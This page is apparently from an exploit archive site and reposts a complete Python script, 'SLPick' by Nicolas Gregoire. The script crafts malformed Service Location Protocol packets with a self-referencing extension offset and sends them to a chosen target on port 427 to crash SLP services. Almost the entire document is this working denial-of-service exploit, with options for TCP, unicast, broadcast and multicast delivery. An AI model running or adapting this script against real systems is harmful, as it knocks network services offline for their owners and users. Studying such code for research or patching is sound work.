首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SLP (Service Location Protocol) Denial Of Service
来源:vfocus.net 作者:vfocus 发布时间:2011-07-27   
#!/usr/bin/python

''' ==================================
          Pseudo documentation 
================================== '''

# SLPick, extension DoS release
# by Nicolas Gregoire

''' ==================================
             Imports 
================================== '''

import getopt
import re
import sys
import binascii
import struct
import socket
import os


''' ==================================
        Default values
================================== '''

version = '0.4'
mode = 'unicast'
source = 'N/A'
target = 'N/A'
xid = '\x12\x34'
port = 427
nb = 1
req = 'sr'

''' ==================================
        Standard functions
================================== '''

# Some nice formatting
def zprint(str):
	print '[=] ' + str

# Function displaying CLI arguments
def showUsage():
    print 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]'
    print '\t[-h] Help (this text)'
    print '\t[-m] Mode : tcp / unicast / broadcast / multicast (default is "' + mode + '")'
    print '\t[-p] Port : default is "' + str(port) + '"'
    print '\t[-s] Source IP Adress : no default (used only in multicast mode)'
    print '\t[-t] Target IP Adress : no default (forced in multicast mode)'
    print '\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)'
    print '\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)'
    sys.exit(1)

# Function parsing parameters
def getArguments():
    try:
        optlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:')
    except getopt.GetoptError:
        showUsage()
    for opt in optlist:
        if opt[0] == '-h':
            showUsage()
        if opt[0] == '-p':
            global port
            port = opt[1]
        if opt[0] == '-s':
            global source
            source = opt[1]
        if opt[0] == '-t':
            global target
            target = opt[1]
        if opt[0] == '-m':
            global mode
	    mode = opt[1]
        if opt[0] == '-n':
            global nb
	    nb = int(opt[1])
        if opt[0] == '-r':
            global req
	    req = opt[1]

# Function checking parameters
def checkArguments():
    if (mode == 'multicast'):
        # XID : must be 0 in multicast mode
        # Target IP : default SLP multicast address
        # Source IP : address of the local interface 
        global xid
        xid = '\x00\x00'
	zprint('Forcing XID to "0"')
        global target
	target = '239.255.255.253'
	zprint('Forcing target IP to "' + target + '"')
        if (source != 'N/A') :
	    zprint('Forcing source IP to "' + source + '"')
        else:
	    zprint('You need to force the source address with "-s" !')
            showUsage()
    elif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'):
        # Target IP : must be defined
        if (target == 'N/A') :
            zprint('Invalid target !')
            showUsage()
    else :
        zprint('Invalid mode !')
        showUsage()

''' ==================================
        SLP functions
================================== '''

# Define payload of type "Service Request"
def getServRequest():

	zprint('Creating payload of type "Service Request"')

	# Function type
	f = '\x01'
	# Empty fields
	previous_list_length = '\x00\x00'
	predicate_length = '\x00\x00'
	scope_length = '\x00\x00'
	spi_length = '\x00\x00'
	# Variable-size fields
	service = 'service:directory-agent'
	service_length = struct.pack('!h', len(service)) 
	# Create message
	m = previous_list_length + service_length + service
	m += predicate_length + scope_length + spi_length

	return(f, m)

# Define payload of type "Attribute Request"
def getAttrRequest():

	zprint('Creating payload of type "Attribue Request"')

	# Function type
	f = '\x06'
	# Empty fields
	previous_list_length = '\x00\x00'
	tag_length = '\x00\x00'
	spi_length = '\x00\x00'
	# Variable-size fields
	url = 'http://www.agarri.fr/'
	url_length = struct.pack('!h', len(url)) 
	scope = 'default'
	scope_length = struct.pack('!h', len(scope)) 
	# Create message
	m = previous_list_length
	m += url_length + url + scope_length + scope
	m += tag_length + spi_length

	return(f, m)

# Define the function creating the full SLP packet
def createPacket(function, message):

	zprint('Adding headers and trailers')

	# SLP Version
	version = '\x02'
        # Set the 'Multicast required' flag to 1
	if (mode == 'broadcast' or mode == 'multicast'):
	    flags = '\x20\x00'
        else:
            flags = '\x00\x00'

        #######################################################
        # Here's the bug !!!!
        #######################################################
        zprint('Using ' + str(nb) + ' extension(s)')
        if (nb == 0):
            # No extension == no bug
	    next_ext_offset = '\x00\x00\x00'
	    extension = ''
	elif (nb == 1):
            # Loop over itself
	    next_ext_offset = '\x00\x00\x05'
	    extension = ''
        elif (nb == 2) :
            # Point to another extension located at the end of the packet
            # TODO : Calculate it at runtime
	    if (req == 'sr'):
                next_ext_offset = '\x00\x00\x31'
            else :
                next_ext_offset = '\x00\x00\x36'
            # OpenSLP : extid should be < 0x4000 or > 0x7FFF 
	    ext_id = '\xBA\xBE'
            # Loop over itself, 0x05 (back to previous extension) should work too 
	    ext_nextoffset = next_ext_offset
	    # Could be anything
            ext_data = '\x22\x22'
	    # Create the trailing extension
            extension = ext_id + ext_nextoffset + ext_data
        else:
	    print 'Wrong number of extensions'
            sys.exit(1)

	# Variable-size headers
	lang = 'en'
	lang_length = struct.pack('!h', len(lang)) 

	# Assemble headers
	headers = flags + next_ext_offset + xid + lang_length + lang

	# Packet = version + function + overall size + headers + message + extension
	packet = version + function + '\x00'
	packet += struct.pack('!h', len(headers + message + extension) + 5) 
	packet += headers + message + extension

	return packet

''' ==================================
           Send packet via TCP or UDP
================================== '''

# Send via TCP
def sendTcpPacket(packet):

	zprint('Sending packet via TCP [' + target + ']')
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(3)
        try:
            s.connect((target, port))
        except socket.error:
            zprint('Socket error (port closed ?)')
            sys.exit(1)
	s.send(packet)
	s.close

# Send via unicast UDP
def sendUnicastPacket(packet):

	zprint('Sending packet via Unicast UDP [' + target + ']')
	s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
	s.sendto( packet, (target, port) )

# Send via broadcast UDP
def sendBroadcastPacket(packet):

        zprint('Sending packet via Broadcast UDP [' + target + ']')
	s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
	s.sendto( packet, (target, port) )

# Send via multicast UDP
def sendMulticastPacket(packet):

	zprint('Sending packet via Multicast UDP [' + target + ']')
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
	sock.bind((source, 6666)) # Select an interface (and an evil port ;-)
	sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
	sock.sendto(packet, (target, port) );

''' ==================================
           Main code
================================== '''

# Print banner
zprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)')

# Set options
getArguments()
checkArguments()

# Which payload ?
if (req == 'ar'):
    func, payload = getAttrRequest()
else :
    func, payload = getServRequest()

# Add headers and trailers (including extensions)
packet = createPacket(func, payload)

# TCP
if (mode == 'tcp'):
	sendTcpPacket(packet)
# UDP
elif (mode == 'unicast'):
	sendUnicastPacket(packet)
elif (mode == 'broadcast'):
	sendBroadcastPacket(packet)
elif (mode == 'multicast'):
	sendMulticastPacket(packet)

# Exit
zprint('Exit')

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ciscokits 1.0 TFTP Server File
·MPlayer Lite r33064 m3u Buffer
·OSX universal ROP shellcode
·Archos OS 2.0.45 File Manager
·Download Accelerator plus (DAP
·MinaliC Webserver v2.0 Remote
·ExtCalendar2 (Auth Bypass/Cook
·Kingsoft AntiVirus 2012 KisKrn
·Joomla 1.5 com_virtuemart <= 1
·Win32 / Windows7 Sp1 - rename
·MyWebServer v1.0.3 Denial Of S
·win32/ 7 sp1 MessageBox
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved